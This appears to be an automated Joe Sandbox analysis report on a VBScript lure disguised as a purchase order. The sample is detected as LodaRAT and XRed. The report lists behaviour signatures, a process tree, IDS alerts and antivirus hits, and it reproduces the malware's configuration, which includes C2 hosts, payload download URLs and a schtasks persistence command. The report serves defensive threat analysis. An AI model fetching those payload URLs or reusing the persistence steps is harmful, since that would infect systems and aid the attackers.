Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Open Purchase Order Summary Details-16-12-2024.vbs

Overview

General Information

Sample name:Open Purchase Order Summary Details-16-12-2024.vbs
Analysis ID:1582356
MD5:3611c7e36499135086695c11f2898395
SHA1:b77dff01a77538f9cdcc86dbb45138f5b9da63b9
SHA256:01e6f507f507e2093552b08d51a575f106bb818cd6f32e2d158543f66d2a11a0
Tags:knkbkk212vbsuser-JAMESWT_MHT
Infos:

Detection

LodaRAT, XRed
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Benign windows process drops PE files
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected LodaRAT
Yara detected XRed
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document contains an embedded VBA with functions possibly related to HTTP operations
Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
Drops PE files to the document folder of the user
Drops PE files to the startup folder
Found API chain indicative of sandbox detection
Machine Learning detection for dropped file
Potential malicious VBS script found (has network functionality)
Sample has a suspicious name (potential lure to open the executable)
Sigma detected: Potentially Suspicious Malware Callback Communication
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Uses dynamic DNS services
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
OS version to string mapping found (often used in BOTs)
One or more processes crash
PE file contains executable resources (Code or Archives)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Script Initiated Connection
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Stores files to the Windows start menu directory
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected ProcessChecker

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 7132 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Open Purchase Order Summary Details-16-12-2024.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • Google.exe (PID: 1148 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe" MD5: 38D3095D1B748CD53C65395718D7C5F4)
      • ._cache_Google.exe (PID: 2836 cmdline: "C:\Users\user\AppData\Local\Temp\._cache_Google.exe" MD5: DF6FA61AC1509C2D8B720690829D5634)
        • cmd.exe (PID: 5920 cmdline: C:\Windows\system32\cmd.exe /c schtasks /create /tn BBLXFG.exe /tr C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe /sc minute /mo 1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 6816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • schtasks.exe (PID: 6596 cmdline: schtasks /create /tn BBLXFG.exe /tr C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe /sc minute /mo 1 MD5: 48C2FE20575769DE916F48EF0676A965)
        • wscript.exe (PID: 4076 cmdline: WSCript C:\Users\user\AppData\Local\Temp\BBLXFG.vbs MD5: FF00E0480075B095948000BDC66E81F0)
      • Synaptics.exe (PID: 5016 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate MD5: ACA4D70521DE30563F4F2501D4D686A5)
        • WerFault.exe (PID: 8132 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5016 -s 4768 MD5: C31336C1EFC2CCB44B4326EA793040F2)
        • WerFault.exe (PID: 8140 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5016 -s 4836 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • EXCEL.EXE (PID: 480 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
  • TXAASJ.exe (PID: 3688 cmdline: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe MD5: DF6FA61AC1509C2D8B720690829D5634)
  • Synaptics.exe (PID: 7464 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" MD5: ACA4D70521DE30563F4F2501D4D686A5)
  • TXAASJ.exe (PID: 8004 cmdline: "C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe" MD5: DF6FA61AC1509C2D8B720690829D5634)
  • Synaptics.exe (PID: 4908 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" MD5: ACA4D70521DE30563F4F2501D4D686A5)
  • TXAASJ.exe (PID: 7180 cmdline: "C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe" MD5: DF6FA61AC1509C2D8B720690829D5634)
  • TXAASJ.exe (PID: 7560 cmdline: "C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe" MD5: DF6FA61AC1509C2D8B720690829D5634)
  • Google.exe (PID: 2212 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe" MD5: 38D3095D1B748CD53C65395718D7C5F4)
    • ._cache_Google.exe (PID: 7852 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exe" MD5: DF6FA61AC1509C2D8B720690829D5634)
    • Synaptics.exe (PID: 7924 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate MD5: ACA4D70521DE30563F4F2501D4D686A5)
      • WerFault.exe (PID: 7192 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7924 -s 12388 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • EXCEL.EXE (PID: 1420 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
  • ._cache_Google.exe (PID: 5000 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exe" MD5: DF6FA61AC1509C2D8B720690829D5634)
  • TXAASJ.exe (PID: 7212 cmdline: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe MD5: DF6FA61AC1509C2D8B720690829D5634)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Loda, LodaRATLoda is a previously undocumented AutoIT malware with a variety of capabilities for spying on victims. Proofpoint first observed Loda in September of 2016 and it has since grown in popularity. The name Loda is derived from a directory to which the malware author chose to write keylogger logs. It should be noted that some antivirus products currently detect Loda as Trojan.Nymeria, although the connection is not well-documented.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.loda

Malware Configuration

Threatname: XRed

{"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_XRedYara detected XRedJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Temp\BBLXFG.vbsJoeSecurity_ProcessCheckerYara detected ProcessCheckerJoe Security
      C:\Users\user\Documents\~$cache1JoeSecurity_XRedYara detected XRedJoe Security
        C:\Users\user\Documents\~$cache1JoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
          C:\Users\user\Documents\DTBZGIOOSO\~$cache1JoeSecurity_XRedYara detected XRedJoe Security
            C:\Users\user\Documents\DTBZGIOOSO\~$cache1JoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
              Click to see the 10 entries

              Memory Dumps

              SourceRuleDescriptionAuthorStrings
              00000000.00000003.1726636255.000002319FC25000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                00000000.00000003.1724371343.00000231A0A93000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XRedYara detected XRedJoe Security
                  00000000.00000003.1726551939.00000231A0520000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XRedYara detected XRedJoe Security
                    00000000.00000003.1724447854.00000231A04BF000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                      00000009.00000002.2950835598.0000000003018000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_ProcessCheckerYara detected ProcessCheckerJoe Security
                        Click to see the 12 entries

                        Unpacked PEs

                        SourceRuleDescriptionAuthorStrings
                        1.0.Google.exe.400000.0.unpackJoeSecurity_XRedYara detected XRedJoe Security
                          1.0.Google.exe.400000.0.unpackJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security

                            Sigma Signatures

                            System Summary

                            barindex
                            Sigma detected: Potentially Suspicious Malware Callback Communication
                            Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 172.111.138.100, DestinationIsIpv6: false, DestinationPort: 5552, EventID: 3, Image: C:\Users\user\AppData\Local\Temp\._cache_Google.exe, Initiated: true, ProcessId: 2836, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49753
                            Sigma detected: Script Initiated Connection to Non-Local Network
                            Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 23.109.93.100, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 7132, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
                            Sigma detected: Script Interpreter Execution From Suspicious Folder
                            Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: WSCript C:\Users\user\AppData\Local\Temp\BBLXFG.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\BBLXFG.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\._cache_Google.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\._cache_Google.exe, ParentProcessId: 2836, ParentProcessName: ._cache_Google.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\BBLXFG.vbs, ProcessId: 4076, ProcessName: wscript.exe
                            Sigma detected: Suspicious Script Execution From Temp Folder
                            Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: WSCript C:\Users\user\AppData\Local\Temp\BBLXFG.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\BBLXFG.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\._cache_Google.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\._cache_Google.exe, ParentProcessId: 2836, ParentProcessName: ._cache_Google.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\BBLXFG.vbs, ProcessId: 4076, ProcessName: wscript.exe
                            Sigma detected: WScript or CScript Dropper
                            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Open Purchase Order Summary Details-16-12-2024.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Open Purchase Order Summary Details-16-12-2024.vbs", CommandLine|base64offset|contains: >, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Open Purchase Order Summary Details-16-12-2024.vbs", ProcessId: 7132, ProcessName: wscript.exe
                            Sigma detected: CurrentVersion Autorun Keys Modification
                            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\Synaptics\Synaptics.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe, ProcessId: 1148, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver
                            Sigma detected: Script Initiated Connection
                            Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 23.109.93.100, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 7132, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
                            Sigma detected: Startup Folder File Write
                            Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Windows\System32\wscript.exe, ProcessId: 7132, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe
                            Sigma detected: Suspicious Schtasks From Env Var Folder
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /create /tn BBLXFG.exe /tr C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe /sc minute /mo 1, CommandLine: schtasks /create /tn BBLXFG.exe /tr C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe /sc minute /mo 1, CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn BBLXFG.exe /tr C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe /sc minute /mo 1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5920, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn BBLXFG.exe /tr C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe /sc minute /mo 1, ProcessId: 6596, ProcessName: schtasks.exe
                            Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                            Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Open Purchase Order Summary Details-16-12-2024.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Open Purchase Order Summary Details-16-12-2024.vbs", CommandLine|base64offset|contains: >, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Open Purchase Order Summary Details-16-12-2024.vbs", ProcessId: 7132, ProcessName: wscript.exe
                            Sigma detected: Office Macro File Creation
                            Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\ProgramData\Synaptics\Synaptics.exe, ProcessId: 5016, TargetFilename: C:\Users\user\AppData\Local\Temp\JLGkYinr.xlsm

                            Suricata Signatures

                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-12-30T11:51:01.761798+010020448871A Network Trojan was detected192.168.2.449736142.250.185.206443TCP
                            2024-12-30T11:51:01.765173+010020448871A Network Trojan was detected192.168.2.449737142.250.185.206443TCP
                            2024-12-30T11:51:02.778748+010020448871A Network Trojan was detected192.168.2.449742142.250.185.206443TCP
                            2024-12-30T11:51:02.794529+010020448871A Network Trojan was detected192.168.2.449741142.250.185.206443TCP
                            2024-12-30T11:51:03.750127+010020448871A Network Trojan was detected192.168.2.449747142.250.185.206443TCP
                            2024-12-30T11:51:03.767397+010020448871A Network Trojan was detected192.168.2.449748142.250.185.206443TCP
                            2024-12-30T11:51:04.894500+010020448871A Network Trojan was detected192.168.2.449755142.250.185.206443TCP
                            2024-12-30T11:51:04.899246+010020448871A Network Trojan was detected192.168.2.449756142.250.185.206443TCP
                            2024-12-30T11:51:05.791889+010020448871A Network Trojan was detected192.168.2.449763142.250.185.206443TCP
                            2024-12-30T11:51:05.791914+010020448871A Network Trojan was detected192.168.2.449762142.250.185.206443TCP
                            2024-12-30T11:51:06.769671+010020448871A Network Trojan was detected192.168.2.449768142.250.185.206443TCP
                            2024-12-30T11:51:06.772489+010020448871A Network Trojan was detected192.168.2.449770142.250.185.206443TCP
                            2024-12-30T11:51:07.783609+010020448871A Network Trojan was detected192.168.2.449772142.250.185.206443TCP
                            2024-12-30T11:51:07.808354+010020448871A Network Trojan was detected192.168.2.449774142.250.185.206443TCP
                            2024-12-30T11:51:08.753854+010020448871A Network Trojan was detected192.168.2.449778142.250.185.206443TCP
                            2024-12-30T11:51:08.802401+010020448871A Network Trojan was detected192.168.2.449779142.250.185.206443TCP
                            2024-12-30T11:51:09.754956+010020448871A Network Trojan was detected192.168.2.449782142.250.185.206443TCP
                            2024-12-30T11:51:09.789690+010020448871A Network Trojan was detected192.168.2.449783142.250.185.206443TCP
                            2024-12-30T11:51:10.777664+010020448871A Network Trojan was detected192.168.2.449787142.250.185.206443TCP
                            2024-12-30T11:51:10.794931+010020448871A Network Trojan was detected192.168.2.449788142.250.185.206443TCP
                            2024-12-30T11:51:11.773802+010020448871A Network Trojan was detected192.168.2.449791142.250.185.206443TCP
                            2024-12-30T11:51:11.777187+010020448871A Network Trojan was detected192.168.2.449792142.250.185.206443TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-12-30T11:51:10.745496+010028309121Malware Command and Control Activity Detected172.111.138.1005552192.168.2.449753TCP
                            2024-12-30T11:51:46.003336+010028309121Malware Command and Control Activity Detected172.111.138.1005552192.168.2.449753TCP
                            2024-12-30T11:52:19.273184+010028309121Malware Command and Control Activity Detected172.111.138.1005552192.168.2.449753TCP
                            2024-12-30T11:52:52.333217+010028309121Malware Command and Control Activity Detected172.111.138.1005552192.168.2.449753TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-12-30T11:51:05.791355+010028326171Malware Command and Control Activity Detected192.168.2.44974069.42.215.25280TCP
                            2024-12-30T11:51:09.623549+010028326171Malware Command and Control Activity Detected192.168.2.44977669.42.215.25280TCP
                            2024-12-30T11:51:51.074024+010028326171Malware Command and Control Activity Detected192.168.2.45192669.42.215.25280TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-12-30T11:50:48.868542+010028498851Malware Command and Control Activity Detected192.168.2.449753172.111.138.1005552TCP
                            2024-12-30T11:51:03.456168+010028498851Malware Command and Control Activity Detected192.168.2.449753172.111.138.1005552TCP

                            Joe Sandbox Signatures

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection

                            barindex
                            Antivirus detection for URL or domain
                            Source: http://xred.site50.net/syn/SSLLibrary.dldAvira URL Cloud: Label: malware
                            Antivirus detection for dropped file
                            Source: C:\Users\user\Documents\~$cache1Avira: detection malicious, Label: TR/Dldr.Agent.SH
                            Source: C:\Users\user\Documents\~$cache1Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                            Source: C:\ProgramData\Synaptics\RCX915F.tmpAvira: detection malicious, Label: TR/Dldr.Agent.SH
                            Source: C:\ProgramData\Synaptics\RCX915F.tmpAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                            Source: C:\ProgramData\Synaptics\Synaptics.exeAvira: detection malicious, Label: TR/Dldr.Agent.SH
                            Source: C:\ProgramData\Synaptics\Synaptics.exeAvira: detection malicious, Label: HEUR/AGEN.1353217
                            Source: C:\ProgramData\Synaptics\Synaptics.exeAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeAvira: detection malicious, Label: HEUR/AGEN.1353217
                            Source: C:\Users\user\Documents\DTBZGIOOSO\~$cache1Avira: detection malicious, Label: TR/Dldr.Agent.SH
                            Source: C:\Users\user\Documents\DTBZGIOOSO\~$cache1Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeAvira: detection malicious, Label: TR/Dldr.Agent.SH
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeAvira: detection malicious, Label: HEUR/AGEN.1353217
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                            Source: C:\Users\user\AppData\Local\Temp\BBLXFG.vbsAvira: detection malicious, Label: VBS/Runner.VPJI
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeAvira: detection malicious, Label: HEUR/AGEN.1353217
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Products-Pdf[1].exeAvira: detection malicious, Label: TR/Dldr.Agent.SH
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Products-Pdf[1].exeAvira: detection malicious, Label: HEUR/AGEN.1353217
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Products-Pdf[1].exeAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeAvira: detection malicious, Label: HEUR/AGEN.1353217
                            Source: C:\ProgramData\Synaptics\RCXC360.tmpAvira: detection malicious, Label: TR/Dldr.Agent.SH
                            Source: C:\ProgramData\Synaptics\RCXC360.tmpAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                            Found malware configuration
                            Source: 1.0.Google.exe.400000.0.unpackMalware Configuration Extractor: XRed {"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}
                            Multi AV Scanner detection for dropped file
                            Source: C:\ProgramData\Synaptics\RCX915F.tmpReversingLabs: Detection: 91%
                            Source: C:\ProgramData\Synaptics\RCXC360.tmpReversingLabs: Detection: 91%
                            Source: C:\ProgramData\Synaptics\Synaptics.exeReversingLabs: Detection: 92%
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Products-Pdf[1].exeReversingLabs: Detection: 92%
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeReversingLabs: Detection: 86%
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeReversingLabs: Detection: 86%
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeReversingLabs: Detection: 92%
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeReversingLabs: Detection: 86%
                            Source: C:\Users\user\Documents\DTBZGIOOSO\~$cache1ReversingLabs: Detection: 91%
                            Source: C:\Users\user\Documents\~$cache1ReversingLabs: Detection: 91%
                            Multi AV Scanner detection for submitted file
                            Source: Open Purchase Order Summary Details-16-12-2024.vbsVirustotal: Detection: 44%Perma Link
                            Source: Open Purchase Order Summary Details-16-12-2024.vbsReversingLabs: Detection: 28%
                            AI detected suspicious sample
                            Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.1% probability
                            Machine Learning detection for dropped file
                            Source: C:\Users\user\Documents\~$cache1Joe Sandbox ML: detected
                            Source: C:\ProgramData\Synaptics\RCX915F.tmpJoe Sandbox ML: detected
                            Source: C:\ProgramData\Synaptics\Synaptics.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\Documents\DTBZGIOOSO\~$cache1Joe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Products-Pdf[1].exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeJoe Sandbox ML: detected
                            Source: C:\ProgramData\Synaptics\RCXC360.tmpJoe Sandbox ML: detected
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
                            Source: unknownHTTPS traffic detected: 23.109.93.100:443 -> 192.168.2.4:49730 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.4:49736 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.4:49737 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.4:49743 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.4:49744 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.4:49747 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.4:49748 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.4:49756 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.4:49762 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.4:49763 version: TLS 1.2
